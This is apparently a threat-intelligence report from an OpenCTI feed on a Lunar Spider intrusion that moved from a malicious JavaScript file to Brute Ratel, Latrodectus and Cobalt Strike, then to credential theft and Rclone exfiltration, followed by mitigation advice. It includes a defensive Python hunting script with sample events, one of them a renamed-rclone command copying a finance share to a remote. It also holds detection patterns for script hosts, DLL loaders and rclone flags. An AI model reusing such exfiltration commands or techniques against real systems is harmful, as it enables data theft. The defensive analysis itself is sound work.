From a Single Click: How Lunar Spider Enabled a Near Two-Month Intrusion
NetmanageIT OpenCTI - opencti.netmanageit.com
SUMMARY :
A user executed a malicious JavaScript file linked to Lunar Spider, initiating a two-month intrusion. The file downloaded a Brute Ratel DLL, which then injected Latrodectus malware. The threat actor used various tools including Cobalt Strike, BackConnect, and a custom .NET backdoor for persistence and lateral movement. They harvested credentials from multiple sources and exfiltrated data using Rclone. The intrusion lasted nearly two months with intermittent C2 connections, discovery, lateral movement, and data theft. Despite comprehensive access to critical infrastructure, no ransomware deployment was observed.
OPENCTI LABELS :
cobalt-strike,lateral-movement,data-exfiltration,credential-harvesting,javascript,brute ratel c4,backconnect,latrodectus,brute-ratel,cobalt strike
AI COMMENTARY :
1. Executive Summary
The report titled “From a Single Click: How Lunar Spider Enabled a Near Two-Month Intrusion” details a sophisticated attack that began when a user executed a malicious JavaScript file attributed to the Lunar Spider threat actor. This initial execution led to the download of a Brute Ratel C4 DLL and the subsequent injection of the Latrodectus malware. Over a period approaching two months, the attacker leveraged tools such as Cobalt Strike, BackConnect and a custom .NET backdoor to maintain persistence, perform lateral movement and harvest credentials. Ultimately, data exfiltration was carried out using Rclone, yet no ransomware was deployed despite broad access to critical infrastructure assets.
2. Initial Access via Malicious JavaScript
The intrusion chain began when a crafted JavaScript payload was delivered to the victim environment, most likely through a phishing email or compromised web resource. Upon execution, the script fetched a Brute Ratel C4 DLL, marking the transition from a simple client-side exploit to an advanced post-exploitation framework. This single click set off a cascade of actions that enabled the threat actor to establish a foothold and escalate privileges within the network.
3. Deployment of Brute Ratel C4 and Latrodectus
Once the Brute Ratel C4 DLL was loaded into memory, the adversary used its post-exploitation capabilities to inject Latrodectus malware into critical processes. Latrodectus provided stealthy backdoor access, allowing the threat actor to issue remote commands while evading endpoint detection. The combination of Brute Ratel’s modular design and Latrodectus’s code injection techniques delivered a versatile platform for automated reconnaissance, credential dumping and future payload deliveries.
4. Use of Cobalt Strike, BackConnect and Custom .NET Backdoor
With initial access established, the attacker deployed Cobalt Strike beacons to perform command and control over secure channels. They supplemented this with BackConnect proxies to obscure their origin and pivoted deeper into the network. A bespoke .NET backdoor was installed to ensure persistent access; this component was designed to reload during system restarts and maintain intermittent communication with the actor’s C2 infrastructure, complicating incident response efforts.
5. Credential Harvesting and Lateral Movement
During the intrusion, the adversary extracted credentials from multiple sources, including Windows credential stores, browser caches and Active Directory queries. Armed with these credentials, they executed lateral movement across hosts and domains, using legitimate administrative tools and built-in protocols to blend in with normal traffic. The coordinated use of credential-harvesting techniques and lateral-movement tactics ensured that critical systems could be accessed without triggering conventional alarms.
6. Data Exfiltration with Rclone
After mapping valuable data repositories, the threat actor leveraged Rclone to transfer sensitive files to external storage endpoints. Rclone’s versatility in handling numerous cloud services made it an ideal choice for exfiltration, as it can mimic routine cloud backup operations. Throughout the exfiltration phase, network monitoring solutions recorded high-volume outbound transfers, but by the time alerts were generated, the attacker had already siphoned significant volumes of data.
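The two stages most visible to endpoint telemetry, the script-host execution that started the chain (section 2) and the Rclone transfer that ended it (section 6), can be hunted in process-creation logs. The following is an added example, not code from the report or from any tool it names; the Sysmon-style events, host names and paths are constructed, and the third rule deliberately matches rclone's command syntax rather than its binary name, since the executable is trivially renamed.

```python
import re
from typing import Dict, List, Tuple

# Constructed, Sysmon-style process-creation events; not taken from the report.
EVENTS: List[Dict[str, str]] = [
    {"id": "1", "parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\wscript.exe",
     "cmd": r'wscript.exe "C:\Users\jdoe\Downloads\invoice_4821.js"'},
    {"id": "2", "parent": r"C:\Windows\System32\wscript.exe", "image": r"C:\Windows\System32\rundll32.exe",
     "cmd": r"rundll32.exe C:\Users\jdoe\AppData\Local\Temp\update.dll,Start"},
    {"id": "3", "parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\ProgramData\rc.exe",
     "cmd": r"rc.exe copy D:\Shares\Finance remote:backup --transfers 20 --config C:\ProgramData\rc.conf"},
    {"id": "4", "parent": r"C:\Windows\explorer.exe", "image": r"C:\Program Files\Office\EXCEL.EXE",
     "cmd": r'"EXCEL.EXE" C:\Users\jdoe\Documents\q3.xlsx'},
]

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
DLL_LOADERS = ("rundll32.exe", "regsvr32.exe")
RCLONE_VERBS = ("copy", "sync", "move")
RCLONE_FLAGS = ("--transfers", "--config", "--bwlimit", "--no-check-certificate")
# rclone addresses remotes as name:path; a Windows drive letter is followed by a backslash instead.
REMOTE_RE = re.compile(r"\s[\w-]+:[^\s:\\]")
USER_SCRIPT_RE = re.compile(r"\\Users\\.*\.jse?\b", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def script_host_from_user_dir(e: Dict[str, str]) -> bool:
    """Rule 1: Windows Script Host running a .js/.jse file from a user-writable path (the initial click)."""
    return basename(e["image"]) in SCRIPT_HOSTS and USER_SCRIPT_RE.search(e["cmd"]) is not None


def dll_loaded_by_script_host(e: Dict[str, str]) -> bool:
    """Rule 2: a script host spawning a DLL loader, i.e. the script handing off to a downloaded DLL."""
    return basename(e["parent"]) in SCRIPT_HOSTS and basename(e["image"]) in DLL_LOADERS


def rclone_like_transfer(e: Dict[str, str]) -> bool:
    """Rule 3: rclone semantics even if the binary was renamed: verb, remote:path target, rclone-only flags."""
    if basename(e["image"]) == "rclone.exe":
        return True
    argv = e["cmd"].split()
    has_verb = len(argv) > 1 and argv[1].lower() in RCLONE_VERBS
    return has_verb and REMOTE_RE.search(e["cmd"]) is not None and any(f in argv for f in RCLONE_FLAGS)


RULES = (script_host_from_user_dir, dll_loaded_by_script_host, rclone_like_transfer)


def hunt(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Return (rule name, event id) for every event that trips a rule; benign events yield nothing."""
    return [(rule.__name__, e["id"]) for e in events for rule in RULES if rule(e)]


if __name__ == "__main__":
    for rule, event_id in hunt(EVENTS):
        print(f"{rule}: event {event_id}")
```

Rule 1 and Rule 2 together give the parent-child sequence that section 2 describes (script host, then a DLL loader), which is a stronger signal than either event alone.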
7. Persistence, Intermittent C2 and Mitigation Strategies
The attack persisted intermittently for nearly two months, characterized by sporadic C2 check-ins, systematic discovery of new assets and continued data theft. Despite full access to critical infrastructure, the actor refrained from deploying ransomware, instead focusing on espionage and data collection. To defend against similar intrusions, organizations should implement robust JavaScript file inspection, enforce strict application control policies, deploy advanced endpoint detection and response tools, monitor anomalous credential usage and segment critical networks. Regular threat hunting and timely patch management will further reduce the risk of extended dwell time and large-scale data exfiltration.